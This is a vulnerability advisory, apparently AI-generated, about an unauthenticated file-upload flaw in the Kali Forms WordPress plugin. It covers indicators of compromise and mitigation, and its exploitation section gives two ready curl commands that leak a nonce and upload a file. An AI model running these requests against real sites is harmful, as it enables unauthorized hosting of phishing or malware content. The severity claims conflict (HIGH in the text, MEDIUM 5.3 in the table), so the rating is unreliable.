CVE-2026-11579
WordPress Análise e mitigação de vulnerabilidades

Visão geral

CVE-2026-11579 is an unauthenticated arbitrary media upload vulnerability in the Kali Forms — Contact Form & Drag-and-Drop Builder WordPress plugin. The flaw affects all versions before 2.4.17 and was discovered and reported by researcher Alexander Jurkschat. It was publicly disclosed on 2026-06-24 and published to the NVD on 2026-07-15. The vulnerability is estimated as HIGH severity by Feedly; no official CVSS score has been assigned at time of publication (WPScan, GitHub Advisory).

Detalhes técnicos

The root cause is insufficient validation in the plugin's file upload handler (kaliforms_form_upload_file AJAX action), which does not verify that an upload request corresponds to an existing form configured with a file-upload field (CWE-434: Unrestricted Upload of File with Dangerous Type). An attacker can first leak a valid WordPress nonce via the unauthenticated kaliforms_get_js_var AJAX endpoint, then use that nonce to submit a file upload directly to wp-admin/admin-ajax.php without any form existing. Uploads are constrained to WordPress's default-allowed MIME types (images, PDFs, Office documents, ZIP, audio/video), which prevents code execution but still allows unauthorized content to be placed in the Media Library. A public proof-of-concept demonstrating the two-step attack was confirmed on Kali Forms 2.4.11 (WPScan).

Impacto

Successful exploitation allows any unauthenticated user to upload arbitrary files of WordPress-permitted MIME types to the site's Media Library, making them publicly accessible via a predictable URL (/wp-content/uploads/YYYY/MM/filename). While direct code execution is not possible due to MIME type restrictions, attackers could abuse this to host malicious content (e.g., phishing pages embedded in PDFs or Office documents), consume server storage, or use the site as a distribution point for malware. Uploaded files are scheduled for automatic deletion approximately 15 minutes after upload via WP-cron, limiting persistent storage abuse (WPScan).

Etapas de exploração

  1. Reconnaissance: Identify WordPress sites running the Kali Forms plugin (versions before 2.4.17) using tools like WPScan or by checking /wp-content/plugins/kali-forms/ for plugin presence.
  2. Leak a valid nonce: Send an unauthenticated POST request to the target's wp-admin/admin-ajax.php endpoint to retrieve a valid nonce:
curl -s -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  --data "action=kaliforms_get_js_var&data[formId]=1&data[key]=ajax_nonce"

The response returns a JSON object containing the nonce value (e.g., {"success":true,"data":"<NONCE>"}). 3. Upload a file: Use the leaked nonce to submit a file upload to the same endpoint without any valid form existing:

curl -s -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  -F "action=kaliforms_form_upload_file" \
  -F "nonce=<NONCE>" \
  -F "file=@payload.png"
  1. Retrieve the uploaded file: On success, the server returns a unique ID string. The uploaded file is publicly accessible at https://TARGET/wp-content/uploads/YYYY/MM/payload.png (WPScan).

Indicadores de compromisso

  • Network: Unauthenticated POST requests to wp-admin/admin-ajax.php with action=kaliforms_get_js_var followed shortly by action=kaliforms_form_upload_file from the same source IP; repeated nonce-fetching requests from automated tools.
  • Logs: Web server access logs showing sequential POST requests to admin-ajax.php with the above action parameters from unauthenticated sessions; HTTP 200 responses to multipart form-data uploads without a corresponding authenticated session.
  • File System: Unexpected files (images, PDFs, ZIP archives, Office documents) appearing in /wp-content/uploads/YYYY/MM/ that do not correspond to any known content management activity; files with random or unusual names matching the uniqid() pattern.
  • WordPress Admin: New media library entries with no associated post or author, uploaded at unusual times or in high volume.

Mitigação e soluções alternativas

Update the Kali Forms — Contact Form & Drag-and-Drop Builder plugin to version 2.4.17 or later, which introduces proper validation to ensure file uploads are only accepted against existing forms configured with a file-upload field (WPScan, GitHub Advisory). As a temporary workaround where immediate patching is not possible, consider blocking unauthenticated POST requests to wp-admin/admin-ajax.php with the action=kaliforms_form_upload_file parameter at the WAF or server level. Monitoring the Media Library for unexpected uploads can also help detect exploitation attempts.

Recursos adicionais


OrigemEste relatório foi gerado usando IA

Relacionado WordPress Vulnerabilidades:

CVE ID

Gravidade

Pontuação

Tecnologias

Nome do componente

Exploração do CISA KEV

Tem correção

Data de publicação

CVE-2026-12512HIGH8.6
  • quotes-llama
NãoSimJul 15, 2026
CVE-2026-12281HIGH8.1
  • shibboleth
NãoSimJul 15, 2026
CVE-2026-12997HIGH7.5
  • gravityforms
NãoSimJul 15, 2026
CVE-2026-11580MEDIUM5.5
  • kali-forms
NãoSimJul 15, 2026
CVE-2026-11579MEDIUM5.3
  • kali-forms
NãoSimJul 15, 2026

Avaliação de vulnerabilidade gratuita

Compare sua postura de segurança na nuvem

Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.

Solicitar avaliação

Marque uma demonstração personalizada

Pronto para ver a Wiz em ação?

"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
David EstlickCISO
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
Adão FletcherDiretor de Segurança
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."
Greg PoniatowskiChefe de Gerenciamento de Ameaças e Vulnerabilidades